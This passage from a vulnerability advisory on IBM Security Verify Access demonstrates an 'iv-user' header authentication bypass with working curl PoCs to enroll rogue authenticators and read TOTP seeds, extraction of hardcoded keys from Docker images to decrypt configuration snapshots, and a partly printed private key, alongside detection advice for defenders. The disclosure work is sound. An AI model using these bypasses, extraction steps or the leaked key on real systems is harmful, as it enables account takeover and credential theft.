"os_version": "13",
"device_type": "[REDACTED]",
"id": "uuid20[REDACTED]",
"enabled": true
},
[...]
kali%
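The contrast between the two listings (an FBTRBA306E error object without the header, a JSON array of authenticators with it) can be turned into an automated probe. A minimal Python sketch, assuming the same endpoint and response shapes shown above; the helper names and the classification heuristic are mine, not part of the product:

```python
import json
import ssl
import urllib.request


def list_authenticators(base_url, user=None):
    """GET /sps/mmfa/user/mgmt/authenticators, optionally impersonating
    `user` via the iv-user header (the bypass described above).
    TLS verification is disabled, matching the advisory's `curl -k` usage."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/sps/mmfa/user/mgmt/authenticators")
    if user is not None:
        req.add_header("iv-user", user)  # the header that bypasses authentication
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx) as resp:
        return json.loads(resp.read())


def looks_vulnerable(anonymous_body, impersonated_body):
    """Heuristic: an unauthenticated request yields an FBTRBA306E error object,
    while an honoured iv-user request yields a JSON list of authenticators."""
    return (isinstance(anonymous_body, dict)
            and "FBTRBA306E" in str(anonymous_body.get("result", ""))
            and isinstance(impersonated_body, list))
```

Calling list_authenticators(url) and list_authenticators(url, "target-user") against an instance and feeding both bodies to looks_vulnerable reproduces the detection logic of the two curl commands above.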
It is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying iv-user: target-user in the HTTP header:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
A PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user target-user. Note that the client_id variable must be edited as we use the specific TestAuthenticatorClient client identifier.
The valid client_id variable can be retrieved from the /sps/mga/user/mgmt/grant API:
kali% curl -kv -H "iv-user: target-user" https://test-runtime/sps/mga/user/mgmt/grant | jq .
{
"grants": [
{
"id": "uuida71[REDACTED]",
"isEnabled": true,
"clientId": "TestAuthenticatorClient",
[...]
I suggest using the specific client_id identifier configured in the targeted instance. The correct client_id identifier can also be obtained by visiting https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html. The device_selection.html webpage is just a front-end to get access to several APIs:
- /sps/mga/user/mgmt/grant
- /sps/mmfa/user/mgmt/authenticators
- /sps/fido2/registrations
- /sps/mga/user/mgmt/device
- /sps/apiauthsvc/policy/u2f_register
- /sps/mga/user/mgmt/clients
- ...
For example, visiting a remote IBM Security Verify Runtime instance at https://url/sps/mga/user/mgmt/html/device/device_selection.html without an iv-user: target-user HTTP header will return empty information (since the resulting requests sent to APIs are not "authenticated"):
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Visiting the same address https://url/sps/mga/user/mgmt/html/device/device_selection.html using Burp Suite Pro, and (i) adding an HTTP header iv-user: target-user in all the resulting HTTP requests and (ii) rewriting the URL from ^\/mga\/sps\/ to \/sps\/ (since the /mga/ path is hardcoded in JavaScript code) will now provide full access for the target-user (adding an authenticator, deleting an authenticator, adding passkeys, ...).
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
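The Burp rewrite rule just mentioned (^\/mga\/sps\/ replaced with \/sps\/) is a plain path substitution and can be sketched outside Burp in a few lines; the function name is mine:

```python
import re

# Mirror of the Burp Suite rewrite rule from the advisory: strip the
# hardcoded /mga prefix so requests hit the runtime instance directly.
_MGA_PREFIX = re.compile(r"^/mga/sps/")


def rewrite_path(path):
    """Rewrite /mga/sps/... (the path hardcoded in the JavaScript front-end)
    to /sps/... (the path served by the runtime Docker instance)."""
    return _MGA_PREFIX.sub("/sps/", path)
```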
An attacker can also add a new authenticator for any user using curl:
PoC:
kali% curl -kv "https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn" -H "iv-user: target-user"
* Host test-runtime:443 was resolved.
* IPv6: (none)
* IPv4: 10.0.0.15
* Trying 10.0.0.15:443...
* Connected to test-runtime (10.0.0.15) port 443
* using HTTP/1.x
> GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn HTTP/1.1
> Host: test-runtime
> User-Agent: curl/8.5.0
> Accept: */*
> iv-user: target-user
>
< HTTP/1.1 302 Found
< X-Frame-Options: SAMEORIGIN
< Pragma: no-cache
< Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y
< Content-Language: en-US
< Transfer-Encoding: chunked
< Date: Sat, 07 Sep 2024 12:07:21 GMT
< Expires: Thu, 01 Dec 1994 16:00:00 GMT
< Cache-Control: no-store, no-cache=set-cookie
<
* Connection #0 to host test-runtime left intact
The resulting secret code provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) corresponding to the target-user.
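Extracting the one-time code from the 302 answer can be automated with the standard library alone; a small sketch (the Location value in the assertions is the one from the transcript above, and the helper name is mine):

```python
from urllib.parse import parse_qs, urlsplit


def enrollment_code(location_header):
    """Pull the one-time enrollment `code` parameter out of the Location
    header returned by /sps/oauth/oauth20/authorize."""
    return parse_qs(urlsplit(location_header).query).get("code", [None])[0]
```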
In order to import this secret token inside an IBM Verify Security application (an authenticator), we can:
- reach the https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y webpage (without /mga at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from /mga/sps/ to /sps/; or
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
- reach the /sps/mmfa/user/mgmt/qr_code/json API to get the JSON-encoded data inside the QR code (using ?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient) and generate the QR code (note that in the next HTTP answer, ignoreSslCerts=true is not the default option); or
GET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient HTTP/1.1
Host: test-runtime
iv-user: target-user
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
HTTP/1.1 200 OK
Content-Type: application/json
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Language: en-US
Connection: Close
Date: Sat, 07 Sep 2024 20:39:55 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-store, no-cache=set-cookie
Content-Length: 202
{"code":"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y","options":"ignoreSslCerts=true",
"details_url":"https:\/\/enroll-url\/mga\/sps\/mmfa\/user\/mgmt\/details",
"version":1,"client_id":"TestAuthenticatorClient"}
- reach the /mga/sps/mmfa/user/mgmt/qr_code/json API (provided by any targeted WebSEAL servers from the same infrastructure, including Internet-facing WebSEAL servers) to get the JSON-encoded data inside the QR code (using ?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient) and generate the QR code; or
- simply locally generate the QR code containing the JSON data as shown below using the qrencode program:
kali% qrencode -o picture.png '{"code":"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y","options":"ignoreSslCerts=false","details_url":"https:\/\/enroll-url\/mga\/sps\/mmfa\/user\/mgmt\/details","version":1,"client_id":"TestAuthenticatorClient"}'
Then the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) in order to enroll a new device. By default, the specific https://enroll-url/mga/sps/mmfa/user/mgmt/details is always reachable from the Internet in order to successfully enroll smartphones.
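The JSON fed to qrencode above mirrors the /sps/mmfa/user/mgmt/qr_code/json answer, so it can also be built locally. A sketch assuming the same five fields; the helper is mine:

```python
import json


def qr_payload(code, client_id, details_url, ignore_ssl=False, version=1):
    """Build the JSON document embedded in the enrollment QR code, with the
    same fields as the /sps/mmfa/user/mgmt/qr_code/json response."""
    return json.dumps({
        "code": code,
        "options": "ignoreSslCerts=%s" % ("true" if ignore_ssl else "false"),
        "details_url": details_url,
        "version": version,
        "client_id": client_id,
    })
```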
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
The official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) has been used and successfully enrolled for the target-user and can now be used to authenticate as target-user:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
The device has been correctly enrolled from the Internet as shown below, by using the /sps/mmfa/user/mgmt/authenticators API without authentication.
kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq .
[
{
"device_name": "Samsung S22",
"oauth_grant": "uuida72253ef[REDACTED]",
"auth_methods": [
{
"key_handle": "32e[REDACTED].userPresence",
"id": "uuidb694[REDACTED]",
"type": "user_presence",
"enabled": true,
"algorithm": "SHA256withRSA"
}
],
"os_version": "13",
"device_type": "[REMOVED]",
"id": "uuidb4fde[REDACTED]",
"enabled": true
},
[...]
Furthermore, all the APIs in /sps/* are directly reachable by specifying the HTTP header iv-user: target-user.
We can also list the secret key for the seed corresponding to OTP:
kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H "iv-user: target-user" | jq .
{
"period": "30",
"secretKeyUrl": "otpauth://totp/Example:target-user?secret=NSJ[REDACTED][REDACTED][REDACTED]&issuer=Example",
"secretKey": "NSJ[REDACTED][REDACTED][REDACTED]",
"digits": "6",
"username": "target-user",
"algorithm": "HmacSHA1"
}
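A leaked secretKey, together with the advertised parameters (HmacSHA1, 6 digits, 30-second period), is everything needed to compute valid one-time passwords. A minimal RFC 6238 sketch using only the standard library; the seed used in the assertions is the RFC 6238 test vector, not real leaked data:

```python
import base64
import hashlib
import hmac
import struct
import time


def totp(secret_b32, period=30, digits=6, at=None):
    """RFC 6238 TOTP with HMAC-SHA1, matching the parameters returned by
    the /sps/mga/user/mgmt/otp/totp endpoint (period=30, digits=6)."""
    pad = "=" * (-len(secret_b32) % 8)            # restore base32 padding
    key = base64.b32decode(secret_b32.upper() + pad)
    counter = int((time.time() if at is None else at) // period)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

With the RFC 6238 test seed GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ (the ASCII key 12345678901234567890), totp(seed, at=59) yields 287082, the last six digits of the published SHA-1 test vector.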
All the APIs located in /sps/ are vulnerable to this authentication bypass.
As shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user.
An attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user.
At the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected.
The latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is strongly recommended to implement this authentication mechanism and not to expose the ISVA runtime instance to the network.
Without this optional authentication, any malicious actor (i) with access to WebSEAL servers (with a shell or an SSRF vulnerability), or (ii) with direct network access to the runtime instance, or (iii) with shell access to any 'trusted' machine (e.g. a monitoring server querying the HTTPS server of the ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials.
Regarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow the following best practices. IBM provided these references as official responses regarding this issue:
- From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;
- And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;
- And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:
Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.
- From my understanding, this vulnerability is not going to be patched (no security bulletin was published, no CVE has been assigned, and the ticket has been closed as solved) because, according to the official recommendations, it is the customer's responsibility to filter any communication to the runtime instance. This security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture.
Regarding the detection of insecure instances, an HTTPS request to the /sps/ route returning the banner Server: IBM Security Verify Access in the answer will allow SOC teams to detect an instance (the banner will not appear when reaching https://test-runtime/). If MFA is used, an HTTP request to /sps/mga/user/mgmt/html/device/device_selection.html (port 443 or 9443, by default) will allow SOC teams to detect an insecure ISVA runtime instance. An answer indicating 200 OK with the content of the device_selection.html webpage indicates that the tested instance is probably insecure:
kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html
[...]
< HTTP/1.1 200 OK
< X-Frame-Options: SAMEORIGIN
< Server: IBM Security Verify Access
< Content-Type: text/html;charset=UTF-8
[...]
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Device Selection</title>
<link type="text/css" rel="stylesheet" href="/sps/static/design.css"></link>
<link type="text/css" rel="stylesheet" href="/sps/mga/user/mgmt/html/device/device_selection.css"></link>
<script type="text/javascript" src="/sps/mga/user/mgmt/html/mgmt_msg.js"></script>
<script type="text/javascript" src="/sps/static/u2fI18n.js"></script>
<script type="text/javascript" src="/sps/mga/user/mgmt/html/common.js"></script>
<script type="text/javascript" src="/sps/mga/user/mgmt/html/device/device_selection.js"></script>
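This fingerprint (200 OK on device_selection.html plus the IBM Security Verify Access Server banner) can be encoded as a small classifier for scan output; a sketch in which the function name and heuristic are mine:

```python
def probably_insecure_runtime(status, headers, body=""):
    """Heuristic from the advisory: a 200 answer on
    /sps/mga/user/mgmt/html/device/device_selection.html carrying the
    'IBM Security Verify Access' Server banner and the Device Selection
    page suggests an exposed, insecure ISVA runtime instance."""
    server = {k.lower(): v for k, v in headers.items()}.get("server", "")
    return (status == 200
            and "IBM Security Verify Access" in server
            and "Device Selection" in body)
```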
On a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html. If device_selection.html is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the device_selection.html webpage available in official IBM Docker images), and the previous /mga/sps/ APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker who enrolled a rogue authenticator to a compromised account can keep persistent access from the Internet even if the runtime instance is no longer reachable or if the "regular" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-facing enrollment server allow attackers to enroll new authenticators and retrieve current seeds.
Furthermore, with Internet-facing servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite large.
It is also possible to list the target version of an Internet-facing instance (proxied through WebSEAL) by visiting the /mga/sps/mmfa/user/mgmt/details API (when MFA is enabled in ISVA):
curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq .
{
"authntrxn_endpoint": "https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending",
"metadata": {
"service_name": "Organisation",
"qrlogin_endpoint": "https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response"
[...]
"enrollment_endpoint": "https://info.domain.tld/scim/Me",
[...]
"version": "10.0.8.0",
[...]
}
Details - Reuse of snapshot private keys
The official Docker images have been retrieved and analyzed on a local machine:
kali-docker# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB
ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB
ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB
ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB
kali-docker# docker save 498e181d7395 > ibmcom/verify-access-runtime.tar
kali-docker# docker save c0003aca743c > ibmcom/verify-access-wrp.tar
kali-docker# docker save 206efdd7809c > ibmcom/verify-access.tar
kali-docker# docker save 959f6f1095e9 > ibmcom/verify-access-dsc.tar
It was observed that instances contain custom encryption/decryption keys (device_key.kdb and device_key.sth files) located inside /var/.ca/.
These keys are used by the isva_decrypt utility present in all the images. For example, the /usr/sbin/bootstrap.sh script will decrypt the stored openldap.zip file using isva_decrypt:
Content of /usr/sbin/bootstrap.sh:
[...]
# Decrypt and extract the LDAP configuration.
isva_decrypt $snapshot_tmp_dir/openldap.zip
unzip -q -o $snapshot_tmp_dir/openldap.zip -d /
[...]
An analysis of the official IBM images obtained from Docker Hub confirms that the keys (device_key.kdb and device_key.sth) are in fact hardcoded inside these images, and some of them are also world-readable by default:
kali-docker# ls -la */*/var/.ca/*
-rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
-rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth
-rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb
-rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth
-rw------- 1 root root 5991 Jun 8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb
-rw------- 1 root root 193 Jun 8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth
-rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb
-rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth
kali-docker# sha256sum */*/var/.ca/*|sort|uniq
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb
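The sha256sum | sort | uniq pipeline above lists one line per path; counting occurrences per digest makes the cross-image key reuse explicit. An illustrative sketch, with two copies of the same dummy key standing in for the extracted images:

```shell
# Count how many files share each digest: a count > 1 means the same key
# material ships in several images. Simulated with dummy key files:
cd "$(mktemp -d)"
mkdir -p img1/var/.ca img2/var/.ca
printf 'same-key-material' > img1/var/.ca/device_key.kdb
printf 'same-key-material' > img2/var/.ca/device_key.kdb
# One digest, two files -> the same key is reused across both images:
sha256sum img*/var/.ca/device_key.kdb | awk '{print $1}' | sort | uniq -c
```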
Using these keys and the IBM Crypto for C programs, we can successfully decrypt the openldap.zip file, an encrypted archive stored inside the default.snapshot file. The snapshot contains the entire configuration of ISVA and is stored inside Docker instances or retrieved over the network. The openldap.zip file contains all the configuration options of the instance and is consequently extremely sensitive. To decrypt it using isva_decrypt, it is sufficient to create, on a test machine, a /var/.ca directory containing device_key.kdb and device_key.sth:
kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip
[...]
writev(5, [{iov_base="", iov_len=0}, {iov_base="2s\0\0etc/openldap/schema/nis.ldif"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="\321\0\0etc/openldap/schema/collectiv"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="\0etc/openldap/slapd-replica.conf"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="data/secAuthority-default/__db.0"..., iov_len=1024}], 2) = 1024
read(4, "\271=b\223\205\320\277\365\207\302#T\255\355\374Ct\222\332M`3%\341\361I\301\233j\34\1\355"..., 8191) = 1124
writev(5, [{iov_base="", iov_len=0}, {iov_base="PK\1\2\36\3\24\0\0\0\10\0\4Z-UQ\202\212<V\2\0\0\0 \0\0000\0\30\0"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="+\0\30\0\0\0\0\0\0\0\0\0\200\201\256\213\7\0var/openldap/d"..., iov_len=1024}], 2) = 1024
read(4, "", 8191) = 0
close(4) = 0
write(5, "\5\0\3\250\302\36cux\v\0\1\4\0\0\0\0\4\0\0\0\0PK\5\6\0\0\0\0[\0"..., 44) = 44
close(5) = 0
unlink("openldap.zip") = 0
rename("/tmp/tmp.pxiQjh", "openldap.zip") = 0
unlink("/tmp/tmp.pxiQjh") = -1 ENOENT (No such file or directory)
close(3) = 0
exit_group(0) = ?
+++ exited with 0 +++
kali-decryption% file openldap.zip
openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store
While doing an analysis of the zip file, we can find:
- credentials;
- passwords (e.g. in etc/openldap/dynamic/replica-1.conf and etc/openldap/dynamic/passwd.conf);
- RSA keys and certificates (e.g. in etc/openldap/dynamic/server.key);
- users in the logs.
The unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:
kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done
./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb
./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb
./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
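Each gsk8capicmd_64 export above produces a PKCS#12 bundle that stock openssl unpacks with -nodes. A self-contained sketch of that unpacking step, using a throwaway key/certificate pair generated on the spot (the real bundles come out of the .kdb files):

```shell
# Build a throwaway key + self-signed cert, bundle them as PKCS#12
# (standing in for a gsk8capicmd_64 export), then unpack with -nodes.
cd "$(mktemp -d)"
openssl req -x509 -newkey rsa:2048 -nodes -keyout k.pem -out c.pem \
    -subj '/CN=demo' -days 1 2>/dev/null
openssl pkcs12 -export -inkey k.pem -in c.pem -out demo.p12 -passout pass:password
# -nodes writes the private key unencrypted into the PEM output:
openssl pkcs12 -in demo.p12 -nodes -passin pass:password -out export.pem 2>/dev/null
grep -c 'PRIVATE KEY' export.pem
```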
This allows an attacker to extract several private keys:
Bag Attributes
friendlyName: ca
localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74
01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26
X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM
+Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr
qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R
CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs
RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm
MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu
894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy
